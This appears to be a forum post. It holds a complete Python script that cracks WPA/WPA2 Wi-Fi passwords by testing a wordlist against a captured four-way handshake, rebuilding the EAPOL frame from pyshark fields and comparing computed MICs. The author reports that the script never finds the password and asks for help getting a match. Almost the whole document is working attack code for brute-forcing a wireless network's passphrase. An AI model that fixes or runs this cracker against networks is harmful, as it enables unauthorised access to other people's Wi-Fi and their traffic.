Here's my wifi bruteforce program:
from hmac import new
from time import sleep
from pyshark import FileCapture
from binascii import a2b_hex, b2a_hex
from hashlib import pbkdf2_hmac, sha1, md5
def MakeMIC(pwd: str, ssid: str, A: bytes, B: bytes, data, wpa: bool = False) -> tuple[list[bytes], bytes, bytes]:
    """Derive a PMK and PTK from *pwd*/*ssid*, then HMAC each element of *data* with PTK[0:16].

    Args:
        pwd: Candidate passphrase; ASCII-encoded (non-ASCII raises UnicodeEncodeError).
        ssid: Network name used as the PBKDF2 salt; ASCII-encoded, same caveat.
        A: Label bytes placed before the single 0x00 separator in every HMAC input.
        B: Context bytes placed between the separator and the counter byte.
        data: Iterable of byte strings; each one is authenticated separately.
        wpa: When True the per-element HMAC uses MD5, otherwise SHA-1.

    Returns:
        ``(mics, ptk, pmk)``: ``mics`` is a list of raw HMAC digests, one per element of
        *data*; ``ptk`` is the first 64 bytes of the HMAC-SHA1 expansion stream; ``pmk``
        is the 32-byte PBKDF2-HMAC-SHA1 output.
    """
    # PBKDF2-HMAC-SHA1, 4096 iterations, 32-byte output.
    pmk = pbkdf2_hmac('sha1', pwd.encode('ascii'), ssid.encode('ascii'), 4096, 32)
    nByte = 64
    i = 0
    R = b''
    # (64*8 + 159) / 160 == 4.19..., so i runs 0..4: five 20-byte SHA-1 digests, R = 100 bytes.
    while i <= (nByte * 8 + 159) / 160:
        # Each chunk is HMAC-SHA1(pmk, A || 0x00 || B || i); chr(i).encode() is one byte for i < 128.
        R += new(pmk, A + chr(0x00).encode() + B + chr(i).encode(), sha1).digest()
        i += 1
    # Only the first 64 bytes of the expansion stream are kept.
    ptk = R[0:nByte]
    # Per-element HMAC keyed with PTK[0:16]; digest algorithm selected by the wpa flag.
    return [new(ptk[0:16], i, md5 if wpa else sha1).digest() for i in data], ptk, pmk
def RunTest(ssid: str, psk: str, aNonce: bytes, sNonce: bytes, apMac: bytes, clMac: bytes, mic1: str, data1: bytes) -> bool:
    """Return True when *psk* reproduces the MIC hex string *mic1* over the bytes *data1*.

    Args:
        ssid: Network name handed to MakeMIC as the PBKDF2 salt.
        psk: Candidate passphrase.
        aNonce, sNonce: Raw nonce bytes; ordered with min()/max() before concatenation.
        apMac, clMac: Raw MAC address bytes; ordered the same way.
        mic1: Expected MIC as a hex string; compared after upper-casing.
        data1: Raw bytes over which the MIC is computed.

    Returns:
        True only if the upper-cased hex of the computed digest, minus its last 8 hex
        characters, equals ``mic1.upper()``. On a match the PMK, PTK and both MIC
        strings are printed before returning.
    """
    # Label b'Pairwise key expansion'; context = min(MAC) || max(MAC) || min(nonce) || max(nonce).
    # wpa is left at its default, so the MIC digest here is SHA-1.
    mics, ptk, pmk = MakeMIC(psk, ssid, b'Pairwise key expansion', min(apMac, clMac) + max(apMac, clMac) + min(aNonce, sNonce) + max(aNonce, sNonce), [data1])
    mic1Str = mic1.upper()
    # Upper-case hex of the first digest with the trailing 8 hex characters (4 bytes) dropped.
    micStr = b2a_hex(mics[0]).decode().upper()[:-8]
    if micStr == mic1Str:
        print('PMK:\t\t' + b2a_hex(pmk).decode().upper())
        print('PTK:\t\t' + b2a_hex(ptk).decode().upper() + '\n')
        print('Target MIC:\t' + mic1Str)
        print('Actual MIC:\t' + micStr)
    # Same value as the comparison above; the conditional expression is redundant.
    return True if micStr == mic1Str else False
def crack_CAP(txtfile: str, ssid: str, capfile: str) -> None:
    """Read handshake fields from *capfile* and test each line of *txtfile* with RunTest.

    Args:
        txtfile: Path to a newline-separated wordlist; each line is stripped before use.
        ssid: Network name passed through to RunTest.
        capfile: Path to a capture file readable by pyshark's FileCapture.

    Side effects:
        Prints the extracted nonces, MACs, MIC and the rebuilt frame hex, then one
        MATCH!/MISMATCH! line per candidate; sleeps one second per candidate and stops
        at the first match.
    """
    # Only EAPOL frames are loaded; packets 0 and 1 of the filtered view are used.
    cap = FileCapture(capfile, display_filter='eapol')
    eap1, eap2, wla2 = cap[0]['EAPOL'], cap[1]['EAPOL'], cap[1]['WLAN']
    # pyshark field values are colon-separated hex; colons are removed before a2b_hex.
    aNonce = a2b_hex(eap1.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
    print('access point Nonce: ' + eap1.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
    sNonce = a2b_hex(eap2.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
    print('client Nonce: ' + eap2.get_field_value('wlan_rsna_keydes_nonce').replace(':', ''))
    # MACs come from the '_resolved' variants of the WLAN-layer bssid/staa fields of packet 1.
    apMac = a2b_hex(wla2.get_field_value('bssid_resolved').replace(':', ''))
    print('access point MAC: ' + wla2.get_field_value('bssid_resolved').replace(':', ''))
    clMac = a2b_hex(wla2.get_field_value('staa_resolved').replace(':', ''))
    print('client MAC: ' + wla2.get_field_value('staa_resolved').replace(':', ''))
    # Target MIC is kept as a hex string (no colons); RunTest upper-cases it for comparison.
    mic1 = eap2.get_field_value('wlan_rsna_keydes_mic').replace(':', '')
    print('2^nd handshake MIC: ' + eap2.get_field_value('wlan_rsna_keydes_mic').replace(':', ''))
    # The frame bytes are rebuilt as colon-separated hex, field by field, in eap2.field_names order.
    data1 = ''
    for i in eap2.field_names:
        # version, type, keydes_type can be integers greater than 9...
        if i in ['version', 'type', 'keydes_type']:
            # The field value string is emitted with a literal '0' prefix.
            data1 += f'0{eap2.get_field_value(i)}:'
        elif i in ['len', 'wlan_rsna_keydes_data_len']:
            # Two big-endian bytes from a decimal field value.
            data1 += f"{((int(eap2.get_field_value(i)) >> 8) & 0xff):02x}:{(int(eap2.get_field_value(i)) & 0xff):02x}:"
        elif i in ['wlan_rsna_keydes_key_info']:
            # Two big-endian bytes from a hexadecimal field value.
            data1 += f"{((int(eap2.get_field_value(i), 16) >> 8) & 0xff):02x}:{(int(eap2.get_field_value(i), 16) & 0xff):02x}:"
        elif i.startswith('wlan_rsna_keydes_key_info') and len(i.split('_')) > 5:
            # Sub-fields of key_info (names with more than five '_'-separated parts) contribute nothing.
            pass
        elif i == 'keydes_key_len':
            # Emitted twice, each with the literal '0' prefix.
            data1 += f'0{eap2.get_field_value(i)}:' * 2
        elif i == 'keydes_replay_counter':
            # Seven zero bytes followed by the '0'-prefixed field value.
            data1 += '00:' * 7 + f'0{eap2.get_field_value(i)}:'
        elif i in ['wlan_rsna_keydes_nonce', 'keydes_key_iv', 'wlan_rsna_keydes_rsc', 'wlan_rsna_keydes_id',
                   'wlan_rsna_keydes_mic']:
            # Copied through unchanged as colon-separated hex.
            data1 += eap2.get_field_value(i) + ':'
        elif i == 'wlan_rsna_keydes_data':
            # The last six characters of the key-data value are dropped; no trailing colon.
            data1 += eap2.get_field_value(i)[:-6]
    print('2^nd handshake Data: ' + data1.replace(':', ''))
    data1 = a2b_hex(data1.replace(':', ''))
    with open(txtfile, 'r') as f:
        for psk in f:
            # Fixed one-second pause between candidates.
            sleep(1)
            password = psk.strip()
            if RunTest(ssid, password, aNonce, sNonce, apMac, clMac, mic1, data1):
                print('MATCH! ' + password)
                break
            else:
                print('MISMATCH! ' + password)
        # Redundant: the with-block already closes the file on exit.
        f.close()
if __name__ == "__main__":
    # The wordlist path, SSID and capture path appear to be placeholders ('Username', 'SSIDName').
    crack_CAP(r'C:\Users\Username\Downloads\passwords.txt', 'SSIDName', r'C:\Users\Username\Downloads\mycapture.cap')
The code works perfectly with no errors. The capture file came from Microsoft Network Monitor 3.4. I intended to put the actual password on the 20th line of passwords.txt, but unfortunately it doesn't match. Is there something wrong with the code?
I tried to forget the password, but that did not work; I also tried using bssid and staa without "_resolved", and it still did not work. I even tried setting wpa=True, with no luck. I'm using a Huawei router, which is the most common one on the planet, so how do I get a password match rather than a mismatch? T.Y.